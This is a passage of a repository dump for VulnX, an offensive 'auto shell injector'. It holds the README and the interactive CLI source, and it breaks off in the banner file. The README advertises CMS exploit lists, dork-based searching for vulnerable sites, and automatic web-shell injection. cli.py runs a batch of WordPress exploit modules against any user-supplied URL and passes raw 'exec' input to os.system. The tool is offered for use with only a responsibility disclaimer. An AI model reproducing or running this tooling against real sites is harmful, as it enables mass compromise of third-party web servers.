.
675 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | VulnX
6 |
7 |
8 |
9 | Vulnx 🕷️ is An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | 
29 |
30 | https://github.com/anouarbensaad/vulnx/archive/master.zip
31 |
32 | VulnX Wiki •
33 | How To Use •
34 | Compatibility •
35 | Library •
36 |
37 |
38 | **Vulnx** is An Intelligent Bot Auto [Shell Injector](https://github.com/anouarbensaad/vulnx/wiki/Usage#run-exploits) that detects vulnerabilities in multiple types of Cms, fast cms detection,informations gathering and vulnerabilitie Scanning of the target like subdomains, ipaddresses, country, org, timezone, region, ans and more ...
39 |
40 | Instead of injecting each and every shell manually like all the other tools do, VulnX analyses the target website checking the presence of a vulnerabilitie if so the shell will be Injected.searching urls with [dorks](https://github.com/anouarbensaad/vulnx/wiki/Usage#searching-dorks) Tool.
41 |
42 | -------------------------------------
43 |
44 | ### _🕷️ Features_
45 |
46 | - Detects cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia)
47 | - Target informations gatherings
48 | - Target Subdomains gathering
49 | - Multi-threading on demand
50 | - Checks for vulnerabilities
51 | - Auto shell injector
52 | - Exploit dork searcher
53 | - [`Ports Scan`](https://user-images.githubusercontent.com/23563528/58365946-40a83a00-7ec3-11e9-87c5-055ed67109b7.jpg) High Level
54 | - [`Dns`](https://user-images.githubusercontent.com/23563528/58365784-09388e00-7ec1-11e9-8a05-e71fa39f146d.png)-Servers Dump
55 | - Input multiple target to scan.
56 | - Dorks Listing by Name& by ExploitName.
57 | - Export multiple target from Dorks into a logfile.
58 |
59 | -------------------------------------
60 |
61 |
62 | ### _🕷️ DNS-Map-Results_
63 |
64 | To do this,run a scan with the --dns flag and -d for subdomains.
65 | To generate a map of isetso.rnu.tn, you can run the command
66 | `vulnx -u isetso.rnu.tn --dns -d --output $PATH`in a new terminal.
67 |
68 | `$PATH` : Where the graphs results will be stored.
69 |
70 | 
71 |
72 |
73 | Let's generates an image displaying target Subdomains,MX & DNS data.
74 |
75 |
76 | 
77 |
78 | -------------------------------------
79 |
80 | ### _🕷️ Exploits_
81 |
82 |
83 |
84 |
85 | ##### Joomla
86 | - [x] [Com Jce ]('#')
87 | - [x] [Com Jwallpapers ]('#')
88 | - [x] [Com Jdownloads ]('#')
89 | - [x] [Com Jdownloads2 ]('#')
90 | - [x] [Com Weblinks ]('#')
91 | - [x] [Com Fabrik ]('#')
92 | - [x] [Com Fabrik2 ]('#')
93 | - [x] [Com Jdownloads Index]('#')
94 | - [x] [Com Foxcontact ]('#')
95 | - [x] [Com Blog ]('#')
96 | - [x] [Com Users ]('#')
97 | - [x] [Com Ads Manager ]('#')
98 | - [x] [Com Sexycontactform]('#')
99 | - [x] [Com Media ]('#')
100 | - [x] [Mod_simplefileupload]('#')
101 | - [x] [Com Facileforms ]('#')
102 | - [x] [Com Facileforms ]('#')
103 | - [x] [Com extplorer ]('#')
104 |
105 | ##### Wordpress
106 | - [x] [Simple Ads Manager ](https://www.exploit-db.com/exploits/36614)
107 | - [x] [InBoundio Marketing ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_inboundio_marketing_file_upload)
108 | - [x] [WPshop eCommerce ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_wpshop_ecommerce_file_upload)
109 | - [x] [Synoptic ](https://cxsecurity.com/issue/WLB-2017030099)
110 | - [x] [Showbiz Pro ](https://www.exploit-db.com/exploits/35385)
111 | - [x] [Job Manager ](https://www.exploit-db.com/exploits/45031)
112 | - [x] [Formcraft ](https://www.exploit-db.com/exploits/30002)
113 | - [x] [PowerZoom ](http://www.exploit4arab.org/exploits/399)
114 | - [x] [Download Manager ](https://www.exploit-db.com/exploits/35533)
115 | - [x] [CherryFramework ](https://www.exploit-db.com/exploits/45896)
116 | - [x] [Catpro ](https://vulners.com/zdt/1337DAY-ID-20256)
117 | - [x] [Blaze SlideShow ](https://0day.today/exploits/18500)
118 | - [x] [Wysija-Newsletters ](https://www.exploit-db.com/exploits/33991)
119 |
120 | ##### Drupal
121 | - [ ] [Add Admin ]('#')
122 | - [ ] [Drupal BruteForcer ]('#')
123 | - [ ] [Drupal Geddon2 ]('#')
124 |
125 | ##### PrestaShop
126 | - [x] [attributewizardpro ]('#')
127 | - [x] [columnadverts ]('#')
128 | - [ ] [soopamobile ]('#')
129 | - [x] [pk_flexmenu ]('#')
130 | - [x] [pk_vertflexmenu ]('#')
131 | - [x] [nvn_export_orders ]('#')
132 | - [x] [megamenu ]('#')
133 | - [x] [tdpsthemeoptionpanel ]('#')
134 | - [ ] [psmodthemeoptionpanel]('#')
135 | - [x] [masseditproduct ]('#')
136 | - [ ] [blocktestimonial ]('#')
137 | - [x] [soopabanners ]('#')
138 | - [x] [Vtermslideshow ]('#')
139 | - [x] [simpleslideshow ]('#')
140 | - [x] [productpageadverts ]('#')
141 | - [x] [homepageadvertise ]('#')
142 | - [ ] [homepageadvertise2 ]('#')
143 | - [x] [jro_homepageadvertise]('#')
144 | - [x] [advancedslider ]('#')
145 | - [x] [cartabandonmentpro ]('#')
146 | - [x] [cartabandonmentproOld]('#')
147 | - [x] [videostab ]('#')
148 | - [x] [wg24themeadministration]('#')
149 | - [x] [fieldvmegamenu ]('#')
150 | - [x] [wdoptionpanel ]('#')
151 |
152 | ##### Opencart
153 | - [ ] [Opencart BruteForce]('#')
154 |
155 |
156 | -------------------------------------
157 |
158 | ### _🕷️ VulnxMode_
159 | `NEW`
160 | vulnx now have an interactive mode.
161 | ***URLSET***
162 |
163 | 
164 |
165 | ***DORKSET***
166 |
167 | 
168 |
169 | -------------------------------------
170 |
171 |
172 |
173 | ### _🕷️ Available command line options_
174 | [`READ VULNX WIKI`](https://github.com/anouarbensaad/vulnx/wiki/Usage)
175 |
176 | usage: vulnx [options]
177 |
178 | -u --url url target
179 | -D --dorks search webs with dorks
180 | -o --output specify output directory
181 | -t --timeout http requests timeout
182 | -c --cms-info search cms info[themes,plugins,user,version..]
183 | -e --exploit searching vulnerability & run exploits
184 | -w --web-info web informations gathering
185 | -d --domain-info subdomains informations gathering
186 | -l, --dork-list list names of dorks exploits
187 | -n, --number-page number page of search engine(Google)
188 | -p, --ports ports to scan
189 | -i, --input specify domains to scan from an input file
190 | --threads number of threads
191 | --dns dns informations gathering
192 |
193 | -------------------------------------
194 |
195 | ### _🕷️ Docker_
196 |
197 | VulnX in DOCKER !!.
198 |
199 | ```bash
200 | $ git clone https://github.com/anouarbensaad/VulnX.git
201 | $ cd VulnX
202 | $ docker build -t vulnx ./docker/
203 | $ docker run -it --name vulnx vulnx:latest -u http://example.com
204 | ```
205 |
206 | run vulnx container in interactive mode
207 |
208 |
209 | 
210 |
211 |
212 | to view logfiles mount it in a volume like so:
213 |
214 | ```bash
215 | $ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com
216 | ```
217 |
218 | change the [mounting directory](https://github.com/anouarbensaad/vulnx/blob/master/docker/Dockerfile#L46)..
219 |
220 | ```Dockerfile
221 | VOLUME [ "$PATH" ]
222 | ```
223 |
224 | -------------------------------------
225 |
226 | ### _🕷️ Install vulnx on Ubuntu_
227 |
228 |
229 | ```bash
230 | $ git clone https://github.com/anouarbensaad/vulnx.git
231 | $ cd VulnX
232 | $ chmod +x install.sh
233 | $ ./install.sh
234 | ```
235 | Now run `vulnx`
236 |
237 | 
238 |
239 |
240 | ### _🕷️ Install vulnx on Termux_
241 |
242 | ```BASH
243 | $ pkg update
244 | $ pkg install -y git
245 | $ git clone http://github.com/anouarbensaad/vulnx
246 | $ cd vulnx
247 | $ chmod +x install.sh
248 | $ ./install.sh
249 | ```
250 | [**CLICK HERE TO SHOW THE RESULT**](https://user-images.githubusercontent.com/23563528/58364091-98847800-7ea6-11e9-9a9a-c27717e4dda1.png)
251 |
252 |
253 | ### _🕷️ Install vulnx in Windows_
254 |
255 | - [click here](https://github.com/anouarbensaad/vulnx/archive/master.zip) to download vulnx
256 | - download and install python3
257 | - unzip **vulnx-master.zip** in ***c:/***
258 | - open the command prompt **cmd**.
259 | ```
260 | > cd c:/vulnx-master
261 | > python vulnx.py
262 | ```
263 |
264 | -------------------------------------
265 |
266 | ##### example command with options : settimeout=3 , cms-gathering = all , -d subdomains-gathering , run --exploits
267 | `vulnx -u http://example.com --timeout 3 -c all -d -w --exploit`
268 |
269 | ##### example command for searching dorks : -D or --dorks , -l --list-dorks
270 | `vulnx --list-dorks`
271 | return table of exploits name.
272 | `vulnx -D blaze`
273 | return urls found with blaze dork
274 |
275 | -------------------------------------
276 |
277 | ### _🕷️ Versions_
278 | - [v1.9](https://github.com/anouarbensaad/vulnx/releases/tag/v1.9)
279 | - [v1.8](https://github.com/anouarbensaad/vulnx/releases/tag/v1.8)
280 | - [v1.7](https://github.com/anouarbensaad/vulnx/releases/tag/v1.7)
281 | - [v1.6](https://github.com/anouarbensaad/vulnx/releases/tag/v1.6)
282 | - [v1.5](https://github.com/anouarbensaad/vulnx/releases/tag/v1.5)
283 | - [v1.4](https://github.com/anouarbensaad/vulnx/releases/tag/v1.4)
284 | - [v1.3](https://github.com/anouarbensaad/vulnx/releases/tag/v1.3)
285 | - [v1.2](https://github.com/anouarbensaad/vulnx/releases/tag/v1.2)
286 | - [v1.1](https://github.com/anouarbensaad/vulnx/releases/tag/v1.1)
287 |
288 | -------------------------------------
289 |
290 | ### :warning: Warning!
291 |
292 | ***I Am Not Responsible of any Illegal Use***
293 |
294 | -------------------------------------
295 |
296 | ### _🕷️ Contribution & License_
297 |
298 | You can contribute in following ways:
299 |
300 | - [Report bugs & add issues](https://github.com/anouarbensaad/VulnX/issues/new)
301 | - Search for new vulnerability
302 | - Develop plugins
303 | - Searching Exploits
304 | - Give suggestions **(Ideas)** to make it better
305 |
306 | Do you want to have a conversation in private? email me : Bensaad.tig@gmail.com
307 |
308 | ***VulnX*** is licensed under [GPL-3.0 License](https://github.com/anouarbensaad/VulnX/blob/master/LICENSE)
309 |
--------------------------------------------------------------------------------
/cli.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | import time
4 | import os
5 | import re
6 | import readline
7 | import glob
8 | import subprocess
9 | from common.colors import end,W,R,B,bannerblue2
10 | from common.banner import banner
11 | from common.requestUp import random_UserAgent
12 | from common.uriParser import parsing_url
13 | from modules.wpExploits import( wp_wysija,
14 | wp_blaze,
15 | wp_catpro,
16 | wp_cherry,
17 | wp_dm,
18 | wp_fromcraft,
19 | wp_jobmanager,
20 | wp_showbiz,
21 | wp_synoptic,
22 | wp_shop,
23 | wp_powerzoomer,
24 | wp_revslider,
25 | wp_adsmanager,
26 | wp_inboundiomarketing,
27 | wp_levoslideshow,
28 | wp_adblockblocker,
29 | )
30 |
31 |
32 | url_regx=re.compile(r'^set url .+')
33 | dork_regx=re.compile(r'^dork')
34 | exec_regx=re.compile(r'^exec .+')
35 | help_regx=re.compile(r'^help')
36 | history_regx=re.compile(r'^history')
37 | exit_regx=re.compile(r'^exit')
38 | cls_regx=re.compile(r'^clear')
39 | var_regx=re.compile(r'^variable')
40 | back_regx=re.compile(r'^back')
41 | run_regx=re.compile(r'^run')
42 | output=re.compile(r'^output \w+$')
43 | page=re.compile(r'^page \d+$')
44 | dorkname_regx=re.compile(r'^set dork .+')
45 | list_regx=re.compile(r'^list')
46 |
47 |
48 | headers = {
49 | 'host' : 'google.com',
50 | 'User-Agent' : random_UserAgent(),
51 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
52 | 'Accept-Language': 'en-US,en;q=0.5',
53 | 'Connection': 'keep-alive',}
54 |
55 | history = []
56 |
57 | #VARIABLE
58 | numberpage=1 #default page−dork variable
59 | output_dir='logs'#default output−dork
60 | dorkname=''
61 | url=''
62 | timeout=''
63 |
64 | W_UL= "\033[4m"
65 | RED_U='\033[1;1;91m'
66 |
67 | #autocompleter
68 | autocompleter_global = ["help","clear","use","info","set","variables","history","exec","dork"]
69 | autocompleter_dork = ["help" , "list" , "set dork" , "clear" , "history" ,"variables" ,"exec","back"]
70 | autocompleter_setdork=["help" , "output" ,"page","run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"]
71 | autocompleter_dork_page=["help" , "output" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"]
72 | autocompleter_dork_output=["help" , "page" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"]
73 | autocompleter_dork_page_output=["help" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"]
74 |
75 | vulnresults = set() # results of vulnerability exploits. [success or failed]
76 | grabinfo = set() # return cms_detected the version , themes , plugins , user ..
77 | subdomains = set() # return subdomains & ip.
78 | hostinfo = set() # host info
79 | data = [ vulnresults, grabinfo, subdomains , hostinfo]
80 |
81 | data_names = ['vulnresults', 'grabinfo', 'subdomains' , 'hostinfo']
82 |
83 | data = {
84 | 'vulnresults':list(vulnresults),
85 | 'grabinfo':list(grabinfo),
86 | 'subdomains':list(subdomains),
87 | }
88 |
89 | class Helpers():
90 |
91 | @staticmethod
92 | def _general_help():
93 | print("""
94 | Command Description
95 | -------- -------------
96 | help/? Show this help menu.
97 | clear/cls clear the vulnx screen
98 | use Use an variable.
99 | info Get information about an available variable.
100 | set Sets a context-specific variable to a value to use while using vulnx.
101 | variables Prints all previously specified variables.
102 | banner Display banner.
103 | history Display command-line most important history from the beginning.
104 | makerc Save command-line history to a file.
105 | exec Execute a system command without closing the vulnx-mode
106 | exit/quit Exit the vulnx-mode
107 | """)
108 |
109 | @staticmethod
110 | def _url_action_help():
111 | print("""
112 | Command Description
113 | -------- -------------
114 | help/? Show this help menu.
115 | timeout set timeout
116 | ports scan ports
117 | domain get domains & sub domains
118 | cms info get cms info (version , user ..)
119 | web info get web info
120 | dump dns dump dns get sub domains [mx-server..]
121 | run exploit run exploits corresponding to cms
122 | clear/cls clear the vulnx screen
123 | history Display command-line most important history from the beginning.
124 | variables Prints all previously specified variables.
125 | back move back from current context
126 | """)
127 |
128 | #dorks - command helpers.
129 |
130 | @staticmethod
131 | def _dorks_action_help():
132 | print("""
133 | Command Description
134 | -------- -------------
135 | help/? Show this help menu.
136 | list list dorks
137 | set dork set exploit name
138 | clear/cls clear the vulnx screen
139 | history Display command-line most important history from the beginning.
140 | variables Prints all previously specified variables.
141 | exec Execute a system command without closing the vulnx-mode
142 | back move back from current context
143 | """)
144 |
145 | @staticmethod
146 | def _dorks_setdork_help():
147 | print("""
148 | Command Description
149 | -------- -------------
150 | help/? Show this help menu.
151 | pages set num page
152 | output output file.
153 | run search web with specified dork
154 | clear/cls clear the vulnx screen
155 | history Display command-line most important history from the beginning.
156 | variables Prints all previously specified variables.
157 | exec Execute a system command without closing the vulnx-mode
158 | back move back from current context
159 | """)
160 |
161 | @staticmethod
162 | def _dorks_setdork_page_help():
163 | print("""
164 | Command Description
165 | -------- -------------
166 | help/? Show this help menu.
167 | output output file.
168 | run search web with specified dork
169 | clear/cls clear the vulnx screen
170 | exec Execute a system command without closing the vulnx-mode
171 | history Display command-line most important history from the beginning.
172 | variables Prints all previously specified variables.
173 | back move back from current context
174 | """)
175 |
176 | @staticmethod
177 | def _dorks_setdork_output_help():
178 | print("""
179 | Command Description
180 | -------- -------------
181 | help/? Show this help menu.
182 | pages set num page
183 | run search web with specified dork
184 | exec Execute a system command without closing the vulnx-mode
185 | clear/cls clear the vulnx screen
186 | history Display command-line most important history from the beginning.
187 | variables Prints all previously specified variables.
188 | back move back from current context
189 | """)
190 |
191 | @staticmethod
192 | def _dorks_setdork_page_output_help():
193 | print("""
194 | Command Description
195 | -------- -------------
196 | help/? Show this help menu.
197 | run search web with specified dork
198 | clear/cls clear the vulnx screen
199 | exec Execute a system command without closing the vulnx-mode
200 | history Display command-line most important history from the beginning.
201 | variables Prints all previously specified variables.
202 | back move back from current context
203 | """)
204 |
205 | class Cli():
206 |
207 | def __runExploits(self,url,headers):
208 | wp_wysija(url,headers,vulnresults)
209 | wp_blaze(url,headers,vulnresults)
210 | wp_catpro(url,headers,vulnresults)
211 | wp_cherry(url,headers,vulnresults)
212 | wp_dm(url,headers,vulnresults)
213 | wp_fromcraft(url,headers,vulnresults)
214 | wp_shop(url,headers,vulnresults)
215 | wp_revslider(url,headers,vulnresults)
216 | wp_adsmanager(url,headers,vulnresults)
217 | wp_inboundiomarketing(url,headers,vulnresults)
218 | wp_levoslideshow(url,headers,vulnresults)
219 | wp_adblockblocker(url,headers,vulnresults)
220 |
221 | def pathCompleter(self,text,state):
222 | line = readline.get_line_buffer().split()
223 | return [x for x in glob.glob(text+'*')][state]
224 |
225 |
226 | def createListCompleter(self,ll):
227 | def listCompleter(text,state):
228 | line = readline.get_line_buffer()
229 | if not line:
230 | return [c + " " for c in ll][state]
231 | else:
232 | return [c + " " for c in ll if c.startswith(line)][state]
233 | self.listCompleter = listCompleter
234 |
235 | @staticmethod
236 | def autoComplete_Global():
237 | t = Cli()
238 | t.createListCompleter(autocompleter_global)
239 | readline.set_completer_delims('\t')
240 | readline.parse_and_bind("tab: complete")
241 | readline.set_completer(t.listCompleter)
242 | @staticmethod
243 | def autoComplete_Dork():
244 | t = Cli()
245 | t.createListCompleter(autocompleter_dork)
246 | readline.set_completer_delims('\t')
247 | readline.parse_and_bind("tab: complete")
248 | readline.set_completer(t.listCompleter)
249 | @staticmethod
250 | def autoComplete_Page():
251 | t = Cli()
252 | t.createListCompleter(autocompleter_dork_page)
253 | readline.set_completer_delims('\t')
254 | readline.parse_and_bind("tab: complete")
255 | readline.set_completer(t.listCompleter)
256 | @staticmethod
257 | def autoComplete_Output():
258 | t = Cli()
259 | t.createListCompleter(autocompleter_dork_output)
260 | readline.set_completer_delims('\t')
261 | readline.parse_and_bind("tab: complete")
262 | readline.set_completer(t.listCompleter)
263 | @staticmethod
264 | def autoComplete_Page_Output():
265 | t = Cli()
266 | t.createListCompleter(autocompleter_dork_page_output)
267 | readline.set_completer_delims('\t')
268 | readline.parse_and_bind("tab: complete")
269 | readline.set_completer(t.listCompleter)
270 | @staticmethod
271 | def autoComplete_setdork():
272 | t = Cli()
273 | t.createListCompleter(autocompleter_setdork)
274 | readline.set_completer_delims('\t')
275 | readline.parse_and_bind("tab: complete")
276 | readline.set_completer(t.listCompleter)
277 |
278 | @staticmethod
279 | def dork_variable(dorkname,output,page):
280 | print("""
281 | VARIABLE VALUE
282 | -------- -----
283 | dorkname %s
284 | output %s
285 | pages %s
286 |
287 | """%(dorkname,output,page))
288 |
289 | @staticmethod
290 | def url_variable(url,timeout):
291 | print("""
292 | VARIABLE VALUE
293 | -------- -----
294 | url %s
295 | timeout %s
296 |
297 | """%(url,timeout))
298 |
299 | @staticmethod
300 | def global_variables(dorkname,output,page,url,timeout):
301 | print("""
302 | VARIABLE VALUE
303 | -------- -----
304 | url %s
305 | timeout %s
306 | dorkname %s
307 | output %s
308 | pages %s
309 |
310 | """%(dorkname,output,page,url,timeout))
311 |
312 | @staticmethod
313 | def _clearscreen():
314 | return os.system('clear')
315 |
316 | @staticmethod
317 | def _exec(cmd):
318 | regx=r'^exec (.+)'
319 | try:
320 | command=re.search(re.compile(regx),cmd).group(1)
321 | except AttributeError: # No match is found
322 | command=re.search(re.compile(regx),cmd)
323 | if command:
324 | return os.system(command)
325 |
326 | @staticmethod
327 | def getDork(pattern):
328 | dork_search=r'^set dork (.+)'
329 | try:
330 | dork=re.search(re.compile(dork_search),pattern).group(1)
331 | except AttributeError: # No match is found
332 | dork=re.search(re.compile(dork_search),pattern)
333 | if dork:
334 | return dork
335 |
336 | @staticmethod
337 | def setPage(page):
338 | page_search=r'^page (\d+$)'
339 | try:
340 | page=re.search(re.compile(page_search),page).group(1)
341 | except AttributeError: # No match is found
342 | page=re.search(re.compile(page_search),page)
343 | if page:
344 | return int(page)
345 |
346 | @staticmethod
347 | def setOutput(directory):
348 | output=r'^output (\w+$)'
349 | try:
350 | rep=re.search(re.compile(output),directory).group(1)
351 | except AttributeError: # No match is found
352 | rep=re.search(re.compile(output),directory)
353 | if rep:
354 | return rep
355 |
356 | @property
357 | def getUrl(self,pattern):
358 | url_search=r'^set url (.+)'
359 | try:
360 | url=re.search(re.compile(url_search),pattern).group(1)
361 | except AttributeError: # No match is found
362 | url=re.search(re.compile(url_search),pattern)
363 | if url:
364 | return url#ParseURL(url)
365 |
366 |
367 | def setdorkCLI(self,cmd_interpreter):
368 |
369 | # REGEX
370 | '''SET DORK VARIABLE'''
371 |
372 | while True:
373 | Cli.autoComplete_Dork()
374 | cmd_interpreter=input("%s%svulnx%s%s (%sDorks%s)> %s" %(bannerblue2,W_UL,end,W,B,W,end))
375 | history.append(cmd_interpreter)
376 | if back_regx.search(cmd_interpreter):
377 | break
378 | if list_regx.search(cmd_interpreter):
379 |
380 | '''SET DORK LIST'''
381 |
382 | print('\n%s[*]%s Listing dorks name..' %(B,end))
383 | from modules.dorksEngine import DorkList as DL
384 | DL.dorkslist()
385 | if cls_regx.search(cmd_interpreter) or cmd_interpreter=='cls':
386 | Cli._clearscreen()
387 | if exit_regx.search(cmd_interpreter) or cmd_interpreter == 'quit':
388 | sys.exit()
389 | if help_regx.search(cmd_interpreter) or cmd_interpreter == '?':
390 | Helpers._dorks_action_help()
391 | if history_regx.search(cmd_interpreter):
392 | for i in range(len(history)):
393 | print(" %s %s"%(i+1,history[i-1]))
394 | if exec_regx.search(cmd_interpreter):
395 | Cli._exec(cmd_interpreter)
396 | if var_regx.search(cmd_interpreter):
397 | Cli.dork_variable(dorkname,output_dir,numberpage)
398 |
399 | '''SET DORK NAME.'''
400 |
401 | if dorkname_regx.search(cmd_interpreter):
402 | while True:
403 | Cli.autoComplete_setdork()
404 | cmd_interpreter_wp=input("%s%svulnx%s%s (%sDorks-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),W,end))
405 | history.append(cmd_interpreter_wp)
406 | '''SET PAGE VARIABLE.'''
407 | if page.search(cmd_interpreter_wp):
408 | while True:
409 | Cli.autoComplete_Page()
410 | cmd_interpreter_wp_page=input("%s%svulnx%s%s (%sDorks-%s-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),Cli.setPage(cmd_interpreter_wp),W,end))
411 | history.append(cmd_interpreter_wp_page)
412 | if output.search(cmd_interpreter_wp_page):
413 | while True:
414 | Cli.autoComplete_Page_Output()
415 | cmd_interpreter_wp_page_output=input("%s%svulnx%s%s (%sDorks-%s-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),Cli.setPage(cmd_interpreter_wp),W,end))
416 | history.append(cmd_interpreter_wp_page_output)
417 | if run_regx.search(cmd_interpreter_wp_page_output):
418 | print('\n')
419 | from modules.dorksEngine import Dorks as D
420 | D.searchengine(Cli.getDork(cmd_interpreter),headers,Cli.setOutput(cmd_interpreter_wp),Cli.setPage(cmd_interpreter_wp))
421 | if back_regx.search(cmd_interpreter_wp_page_output):
422 | break
423 | if help_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output=='?':
424 | Helpers._dorks_setdork_page_output_help()
425 | if cls_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output=='cls':
426 | Cli._clearscreen()
427 | if exit_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output == 'quit':
428 | sys.exit()
429 | if history_regx.search(cmd_interpreter_wp_page_output):
430 | for i in range(len(history)):
431 | print(" %s %s"%(i+1,history[i-1]))
432 | if exec_regx.search(cmd_interpreter_wp_page_output):
433 | Cli._exec(cmd_interpreter_wp_page_output)
434 | if var_regx.search(cmd_interpreter_wp_page_output):
435 | Cli.dork_variable(Cli.getDork(cmd_interpreter),Cli.setOutput(cmd_interpreter_wp),Cli.setPage(cmd_interpreter_wp))
436 |
437 |
438 | if run_regx.search(cmd_interpreter_wp_page):
439 | print('\n')
440 | from modules.dorksEngine import Dorks as D
441 | D.searchengine(Cli.getDork(cmd_interpreter),headers,output_dir,Cli.setPage(cmd_interpreter_wp))
442 | if back_regx.search(cmd_interpreter_wp_page):
443 | break
444 | if help_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page=='?':
445 | Helpers._dorks_setdork_page_help()
446 | if cls_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page=='cls':
447 | Cli._clearscreen()
448 | if exit_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page == 'quit':
449 | sys.exit()
450 | if history_regx.search(cmd_interpreter_wp_page):
451 | for i in range(len(history)):
452 | print(" %s %s"%(i+1,history[i-1]))
453 | if exec_regx.search(cmd_interpreter_wp_page):
454 | Cli._exec(cmd_interpreter_wp_page)
455 | if var_regx.search(cmd_interpreter_wp_page):
456 | Cli.dork_variable(Cli.getDork(cmd_interpreter),output_dir,Cli.setPage(cmd_interpreter_wp))
457 |
458 |
459 | '''SET OUTPUT VARIABLE.'''
460 |
461 | if output.search(cmd_interpreter_wp):
462 | while True:
463 | Cli.autoComplete_Output()
464 | cmd_interpreter_wp_output=input("%s%svulnx%s%s (%sDorks-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),W,end))
465 | history.append(cmd_interpreter_wp_output)
466 | if run_regx.search(cmd_interpreter_wp_output):
467 | print('\n')
468 | from modules.dorksEngine import Dorks as D
469 | D.searchengine(Cli.getDork(cmd_interpreter),headers,Cli.setOutput(cmd_interpreter_wp),numberpage)
470 | if back_regx.search(cmd_interpreter_wp_output):
471 | break
472 | if cls_regx.search(cmd_interpreter_wp_output) or cmd_interpreter_wp_output=='cls':
473 | Cli._clearscreen()
474 | if exit_regx.search(cmd_interpreter_wp_output) or cmd_interpreter_wp_output == 'quit':
475 | sys.exit()
476 | if help_regx.search(cmd_interpreter_wp_output) or cmd_interpreter_wp_output=='?':
477 | Helpers._dorks_setdork_output_help()
478 | if history_regx.search(cmd_interpreter_wp_output):
479 | for i in range(len(history)):
480 | print(" %s %s"%(i+1,history[i-1]))
481 | if exec_regx.search(cmd_interpreter_wp_output):
482 | Cli._exec(cmd_interpreter_wp_output)
483 | if var_regx.search(cmd_interpreter_wp_output):
484 | Cli.dork_variable(Cli.getDork(cmd_interpreter),Cli.setOutput(cmd_interpreter_wp),numberpage)
485 |
486 |
487 | if run_regx.search(cmd_interpreter_wp):
488 | print('\n')
489 | from modules.dorksEngine import Dorks as D
490 | D.searchengine(Cli.getDork(cmd_interpreter),headers,output_dir,numberpage)
491 | if back_regx.search(cmd_interpreter_wp):
492 | break
493 | if help_regx.search(cmd_interpreter_wp) or cmd_interpreter_wp=='?':
494 | Helpers._dorks_setdork_help()
495 | if cls_regx.search(cmd_interpreter_wp) or cmd_interpreter_wp=='cls':
496 | Cli._clearscreen()
497 | if exit_regx.search(cmd_interpreter_wp) or cmd_interpreter_wp == 'quit':
498 | sys.exit()
499 | if history_regx.search(cmd_interpreter_wp):
500 | for i in range(len(history)):
501 | print(" %s %s"%(i+1,history[i-1]))
502 | if exec_regx.search(cmd_interpreter_wp):
503 | Cli._exec(cmd_interpreter_wp)
504 | if var_regx.search(cmd_interpreter_wp):
505 | Cli.dork_variable(Cli.getDork(cmd_interpreter),output_dir,numberpage)
506 |
507 |
508 |
509 | def send_commands(self,cmd):
510 | while True:
511 | Cli.autoComplete_Global()
512 | cmd = input("%s%svulnx%s > "% (bannerblue2,W_UL,end))
513 | history.append(cmd)
514 | if url_regx.search(cmd):
515 | #url session
516 | while True:
517 | cmd_interpreter=input("%s%svulnx%s%s target(%s%s%s) > %s" %(bannerblue2,W_UL,end,W,R,self.getUrl(cmd),W,end))
518 | history.append(cmd_interpreter)
519 | if cmd_interpreter == 'back':
520 | break
521 | elif cmd_interpreter == 'run exploit':
522 | print('\n%s[*]%s Running exploits..' %(B,end))
523 | root = self.getUrl(cmd)
524 | if root.startswith('http'):
525 | url_root = root
526 | else:
527 | url_root = 'http://'+url_root
528 | self.__runExploits(url_root,headers)
529 | elif help_regx.search(cmd_interpreter) or cmd_interpreter == '?':
530 | Helpers._url_action_help()
531 | elif exit_regx.search(cmd_interpreter) or cmd_interpreter == 'quit':
532 | sys.exit()
533 | else:
534 | print("use (help) (?) to show man commands.")
535 | elif dork_regx.search(cmd):
536 | #dork session
537 | self.setdorkCLI(cmd)
538 | elif exit_regx.search(cmd) or cmd == 'quit':
539 | sys.exit()
540 | elif help_regx.search(cmd) or cmd == '?':
541 | Helpers._general_help()
542 | elif cls_regx.search(cmd) or cmd == 'cls':
543 | Cli._clearscreen()
544 | elif history_regx.search(cmd):
545 | for i in range(len(history)):
546 | print(" %s %s"%(i+1,history[i-1]))
547 | elif exec_regx.search(cmd):
548 | Cli._exec(cmd)
549 | elif var_regx.search(cmd):
550 | Cli.global_variables(dorkname,output_dir,numberpage,url,timeout)
551 | else:
552 | print("use (help) (?) to show man commands.")
553 |
--------------------------------------------------------------------------------
/common/__init__.py:
--------------------------------------------------------------------------------
1 | """The vulnx commonfiles."""
2 |
--------------------------------------------------------------------------------
/common/banner.py:
--------------------------------------------------------------------------------
1 | import sys
2 | from common.colors import bannerblue , bannerblue2 ,W ,Y ,R,end
3 |
4 | def banner():
5 | print("""%s
6 |
7 | .:. .:,
8 | xM; XK.
9 | dx' .lO.
10 | do ,0.
11 | .c.lN' , '. .k0.:'
12 | xMMk;d;''cOM0kWXl,',locMMX.
13 | .NMK. :WMMMMMMMx dMMc
14 | lMMO lWMMMMMMMMMO. lMMO
